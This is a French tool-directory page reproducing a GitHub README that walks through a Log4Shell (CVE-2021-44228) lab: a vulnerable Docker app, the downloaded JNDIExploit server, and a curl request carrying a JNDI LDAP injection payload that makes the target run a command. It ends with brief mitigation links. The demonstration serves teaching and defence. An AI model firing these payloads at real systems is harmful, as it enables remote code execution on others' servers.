Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4Shell — Ce dépôt sert à la démonstration et à l’atténuation de la vulnérabilité Log4j 2021 (CVE-2021-44228). | Kitploit
Outils/GitHubGitHub/feryaeljustice/log4shell
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubferyaeljustice/log4shell

Log4Shell

Ce dépôt sert à la démonstration et à l’atténuation de la vulnérabilité Log4j 2021 (CVE-2021-44228).

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4Shell

Ce dépôt est destiné à la démonstration et à l'atténuation de la vulnérabilité Log4j 2021 (CVE-2021-44228).

Qu'est-ce que Log4Shell ?

La vulnérabilité CVE-2021-44228 / Log4Shell consiste à injecter dans un logiciel vulnérable une charge utile malveillante, qui demandera à Log4J d'obtenir une valeur auprès d'une source tierce, via JNDI et le protocole LDAP. ... Les données importées peuvent être du code, qui sera exécuté par Log4J sur le système.

Preuve de concept (TUTORIEL VIDÉO)

  1. Nous exécutons une application web Spring Boot vulnérable à CVE-2021-44228 dans Docker, surnommée Log4Shell par @christophetd. Elle utilise Log4j 2.14.1 (via spring-boot-starter-log4j2 2.6.1) et le JDK 1.8.0_181. docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app Log4Shell_1 Log4Shell_2

  • Nous téléchargeons l'exploit JNDI pour Log4Shell depuis les archives web dans ce cas, mais vous pouvez le télécharger où il est disponible. wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip Log4Shell_3 Log4Shell_4

  • Nous obtenons l'adresse IP de notre machine qui exécute le docker de l'application Log4Shell. ifconfig Log4Shell_IP

  • Nous décompressons le zip contenant l'exploit JNDI pour Log4Shell, afin d'obtenir le JAR, puis nous l'exécutons en indiquant notre IP obtenue à l'étape 3.

  • root@kitploit:~
    unzip JNDIExploit.v1.2.zip
    java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
    

    Log4Shell_5

    1. Ensuite, déclenchez l'exploit en utilisant : curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' Log4Shell_6
    • Nous constatons une connexion JNDI vers notre machine, et nous pouvons voir le code exécuté par Log4J. Log4Shell_7
    1. Pour confirmer que l'exécution du code a réussi, remarquez que le fichier /tmp/pwned.txt a été créé dans le conteneur exécutant l'application vulnérable. docker exec vulnerable-app ls /tmp Log4Shell_8

    Atténuation

    Vidéo expliquant comment atténuer la vulnérabilité Log4Shell sous Windows et Linux : ATTÉNUATION

    Atténuation sous Linux (exemple en image)

    MITIGATION

    Auteur

    Feryael Justice 2022

    Télécharger l’outil